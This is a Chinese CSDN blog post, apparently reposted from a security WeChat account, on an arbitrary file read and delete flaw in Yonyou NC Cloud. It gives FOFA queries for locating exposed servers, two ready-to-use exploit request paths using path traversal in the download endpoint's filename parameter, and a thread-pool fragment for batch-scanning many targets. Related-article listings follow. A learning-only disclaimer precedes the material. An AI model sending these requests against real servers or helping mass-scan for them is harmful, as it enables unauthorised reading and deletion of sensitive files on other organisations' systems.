[1day]用友NC存在任意文件读取删除漏洞[附批量POC]

最新推荐文章于 2024-07-16 00:15:00 发布
最新推荐文章于 2024-07-16 00:15:00 发布
阅读量603 收藏 10
点赞数 8
文章标签: 安全 网络安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liyu_6618/article/details/135979917
版权
本文报道了用友NCCloud平台存在任意文件读取和删除漏洞,通过POC方法展示了如何利用这些漏洞,并提供了批量测试脚本。强调测试仅供学习,用户需注意法律责任。
摘要由CSDN通过智能技术生成

关注本公众号,长期推送漏洞文章

知攻善防实验室

红蓝对抗,Web渗透测试,红队攻击,蓝队防守,内网渗透,漏洞分析,漏洞原理,开源 工具,社工钓鱼,网络安全。

73篇原创内容

公众号

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

简介

用友NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现人、财、物、客的 全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。

用友NC的download文件存在任意文件读取和任意文件删除漏洞,攻击者可以利用该漏洞读取或删除服务器上的敏感文件。

资产

fofa:app="用友-UFIDA-NC"

图片

fofa:title="YONYOU NC"

图片

漏洞复现


任意文件读取:

POC:

/portal/pt/xml/file/download?pageId=login&filename=..\index.jsp

任意文件删除:

/portal/pt/xml/file/download?pageId=login&filename=../index.jsp

区别在于"\"和"/"

直接拼接URL即可下载文件

图片

批量测试:

通过线程池进行批量测试

with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:     executor.map(check_vulnerability, targets)

更改max_workers即可限制线程池数量

图片

脚本获取地址:

关注本公众号"知攻善防实验室":后台回复"1107"获取

后台回复:“交流群”获取技术交流群链接

知攻善防实验室
关注
漏洞复现】用友NC word.docx 任意文件读取漏洞
qq_67810151的博客
04-13 351
用友NC word.docx 接口存在任意文件读取漏洞,未授权的攻击者可以通过该漏洞进行任意文件读取,造成服务器敏感信息泄露。
用友NC printBill 任意文件读取/删除漏洞复现(XVE-2024-10609)
0xSec
05-14 472
用友NC printBill 接口处存在任意文件读取/删除漏洞,未经身份验证的远程攻击者可利用该漏洞读取删除系统敏感文件。使系统处于极不安全的状态。
漏洞复现】用友NC——文件上传漏洞
最新发布
weixin_54799594的博客
07-16 1078
漏洞复现过程记录
(新接口)用友NC某接口存在任意文件读取漏洞-0day
weixin_43167326的博客
02-22 1619
用友NC是一款企业级ERP(企业资源计划)软件,它提供了全面的财务、人力资源、采购、销售、生产等各种业务管理模块,适用于中小型企业和大型集团公司。用友NC具有良好的可扩展性和可定制性,可以满足企业在不同行业和不同规模下的管理需求。该系统基于Java EE技术开发,具有跨平台、集成度高、业务流程自动化、信息共享等特点,能够有效提高企业的管理效率和降低成本,是众多企业的首选管理软件。。
漏洞复现】用友 NC NCFindWeb 任意文件读取漏洞
凝聚力安全团队
06-20 492
用友NC cloud,大型企业数字化平台,聚焦数字化管理、数字化经营、数字化商业,帮助大型集团企业实现人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。
用友NC任意文件读取
voctor2436的博客
05-24 1288
用友NC产品的全新系列、是面向集团企业的世界级高端管理软件,用友NC6的产品定位于大型企业管理与电子商务平台。用友NCFindWeb文件存在任意文件读取漏洞,攻击者通过漏洞可以获取网站源码,导致服务器失陷。用友NC采用J2EE架构和先进开放的集团级开发平台UAP,形成了集团管控8大领域15大行业68个细分行业的解决方案。一般性的建议:关注官方新版本的发布及补丁更新,建议使用对应WAF/IPS进行防护。
【0day】用友NC portal接口任意文件读取漏洞学习
记录并分享学习安全的知识点..
10-15 369
Yonyou NC是一款成熟的企业管理软件,已经在国内外众多企业中得到广泛应用。它具有完善的功能、稳定的性能、丰富的经验和优秀的服务,可以帮助企业提高管理效率、降低成本、提升竞争力。用友NC portal接口存在任意文件读取漏洞,攻击者可以在未经授权的情况下读取系统上的任意文件
用友 UFIDA NC portal/file 任意文件读取漏洞(含批量验证poc
weixin_43567873的博客
04-18 186
用友 UFIDA NC portal/file 任意文件读取漏洞(含批量验证poc
用友NC grouptemplet任意文件上传漏洞(含批量验证poc
weixin_43567873的博客
04-17 246
用友NC grouptemplet任意文件上传漏洞(含批量验证poc
用友NC downCourseWare 任意文件读取漏洞复现
0xSec
06-06 559
用友NC 系统 /portal/pt/downCourseWare/download接口的filename参数存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,使系统处于极不安全状态。
用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞(含批量验证poc
weixin_43567873的博客
04-08 104
用友NC-Cloud_importhttpscer接口存在任意文件上传漏洞(含批量验证poc
用友账套数据文件信息读取.exe
04-15
账套数据文件信息读取.exe
用友U8-Cloud接口FileServlet存在任意文件读取漏洞(含批量验证poc
weixin_43567873的博客
03-29 150
用友U8-Cloud接口FileServlet存在任意文件读取漏洞
用友NC BeanShell命令执行漏洞(CNVD-2021-30167)+任意文件读取漏洞+接口信息泄露
weixin_45908624的博客
01-16 1736
NC 6.X 远程命令执行漏洞
用友NC ELTextFile.load.d 任意文件读取漏洞复现
0xSec
11-22 643
用友NC ELTextFile.load.d 接口处存在任意文件读取漏洞,未经身份验证的远程攻击者可利用该漏洞读取系统敏感文件。使系统处于极不安全的状态。
漏洞复现】用友NC-download-文件读取
知黑而守白
01-23 173
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业。用友NC download 接口存在任意文件读取漏洞。攻击者可以通过恶意构造的请求读取服务器上的任意文件,包括敏感的系统文件。此漏洞可能导致泄露敏感信息,为攻击者提供足够的信息来进一步渗透系统。
7天学习Go语言-尾声+一次险些翻车的任意文件读取漏洞小记
weixin_48421613的博客
03-07 504
接口 接口的定义 接口(interface )类型是对其他类型行为的概括和抽象,接口类型定义了一组方法,但是不包括这些方法的具体实现 接口本质是一种指针类型,可以实现多态功能。如果一个类型实现了某个接口,则所有使用这个接口的地方都支持这种类型的值。接口的定义格式如下: type 接口名称 interface { method1 (参数列表) 返回值列表 method2 (参数列表) 返回值列表 } 例如: type Num interface { Eq (i Num) bool } 如果接口没有任何方
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 9209
用友NC 漏洞汇总
漏洞复现】泛微OA E-Cology ln.FileDownload 任意文件读取漏洞
凝聚力安全团队
06-18 674
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公解决方案。e-cology平台提供了一系列协同办公工具,包括在线办公应用、文档管理、任务管理、日程安排、电子邮件和即时通讯等。泛微OA ln.FileDownload 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器任意文件。。
任意文件读取漏洞poc
09-03
任意文件读取漏洞poc的下载地址为GitHub - YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi: Tomcat-Ajp协议文件读取漏洞。这个漏洞是由长亭科技安全研究员发现的存在于Tomcat中的安全漏洞。攻击者通过Tomcat AJP协议的设计缺陷,可以利用Tomcat AJP Connector读取或包含Tomcat上所有webapp目录下的任意文件。这包括了读取webapp配置文件或源代码。如果目标应用有文件上传功能,配合文件包含的利用还可以导致远程代码执行的危害。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [幽灵猫 Tomcat文件读取/任意文件包含漏洞(CVE-2020-1938 / CNVD-2020-10487)](https://blog.csdn.net/m0_62466350/article/details/130568199)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值